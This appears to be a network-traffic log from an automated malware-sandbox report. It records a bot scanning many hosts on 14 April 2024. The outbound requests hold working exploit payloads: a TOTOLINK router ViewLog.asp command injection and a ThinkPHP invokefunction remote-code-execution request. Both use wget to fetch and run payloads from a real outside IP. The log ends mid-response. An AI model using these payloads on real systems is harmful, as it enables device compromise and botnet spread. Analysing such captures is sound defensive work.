                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:24.651487112 CEST626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Sun, 14 Apr 2024 14:36:24 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        572192.168.2.234056631.130.39.788080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.319097996 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:24.651550055 CEST424INHTTP/1.1 401 Unauthorized
                                                        Date: Mon, 09 Feb 2015 05:47:04 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        WWW-Authenticate: Basic realm="TOTOLINK A2004NS"
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /cgi-bin/ViewLog.asp from this server.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        573192.168.2.235982094.123.100.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.346213102 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        574192.168.2.2342488112.213.39.12480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.618422031 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:24.928281069 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:24 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        575192.168.2.234273494.122.75.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.047440052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        576192.168.2.234061862.212.55.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.073039055 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:26.442496061 CEST257INHTTP/1.0 307 Temporary Redirect
                                                        Content-Length: 0
                                                        Content-Type: text/html
                                                        Date: Sun, 14 Apr 2024 14:36:19 GMT
                                                        Expires: Sun, 14 Apr 2024 14:36:19 GMT
                                                        Server: Mikrotik HttpProxy
                                                        Proxy-Connection: close
                                                        Location: http://paynet.ge/suspend


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        577192.168.2.234616695.100.186.3280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.231290102 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:26.521910906 CEST579INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 357
                                                        Expires: Sun, 14 Apr 2024 14:36:26 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:26 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 33 65 32 32 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 36 26 23 34 36 3b 65 36 32 63 30 38 61 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 33 65 32 32 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 36 26 23 34 36 3b 65 36 32 63 30 38 61 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;43e2217&#46;1713105386&#46;e62c08a<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;43e2217&#46;1713105386&#46;e62c08a</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        578192.168.2.235113495.128.73.1280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.242737055 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:26.548758984 CEST1265INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:26 GMT
                                                        Server: Apache
                                                        Vary: accept-language,accept-charset,Accept-Encoding
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Accept-Ranges: bytes
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Language: fr
                                                        Expires: Sun, 14 Apr 2024 14:36:26 GMT
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 66 72 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 65 6d 61 6e 64 65 20 69 6e 63 6f 72 72 65 63 74 65 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 6f 62 6f 64 79 40 6e 6f 62 6f 64 79 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 44 65 6d 61 6e 64 65 20 69 6e 63 6f 72 72 65 63 74 65 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 56 6f 74 72 65 20 6e 61 76 69 67 61 74 65 75 72 20 28 6f 75 20 76 6f 74 72 65 20 70 72 6f 78 79 29 20 61 20 65 6e 76 6f 79 26 65 61 63 75 74 65 3b 0a 20 20 20 20 75 6e 65 20 64 65 6d 61 6e 64 65 20 71 75 65 20 63 65 20 73 65 72 76 65 75 72 20 6e 27 61 20 70 61 73 20 63 6f 6d 70 72 69 73 65 2e 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 69 20 76 6f 75 73 20 70 65 6e 73 65 7a 20 71 75 27 69 6c 20 73 27 61 67 69 74 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 64 75 20 73 65 72 76 65 75 72 2c 20 76 65 75 69 6c 6c 65 7a 20 63 6f 6e 74 61 63 74 65 72 20 6c 65 20 0a 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 6f 62 6f 64 79 40 6e 6f 62 6f 64 79 22 3e 77 65 62 6d 65 73 74 72 65 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 30 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 68 64 78 35 30 31 32 2e 63 65 6c 65 6f 2e 6e 65 74 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 0a
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="fr" xml:lang="fr"><head><title>Demande incorrecte!</title><link rev="made" href="mailto:nobody@nobody" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Demande incorrecte!</h1><p> Votre navigateur (ou votre proxy) a envoy&eacute; une demande que ce serveur n'a pas comprise.</p><p>Si vous pensez qu'il s'agit d'une erreur du serveur, veuillez contacter le <a href="mailto:nobody@nobody">webmestre</a>.</p><h2>Error 400</h2><address> <a href="/">hdx5012.celeo.net</a><br /> <span>Apache</span></address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        579192.168.2.234302495.143.183.21180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.247241020 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:26.553709030 CEST520INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:26 GMT
                                                        Server: Apache/2.2.22 (Debian)
                                                        Vary: Accept-Encoding
                                                        Content-Length: 303
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6d 69 72 2d 6a 69 7a 6e 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.22 (Debian) Server at mir-jizn.ru Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        580192.168.2.235944695.216.8.18080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.267555952 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:26.593780041 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 13:36:22 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        581192.168.2.234794894.177.135.2048080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.337945938 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:26.628691912 CEST1289INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.9
                                                        Mime-Version: 1.0
                                                        Date: Sat, 05 Jun 2021 11:30:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3161
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 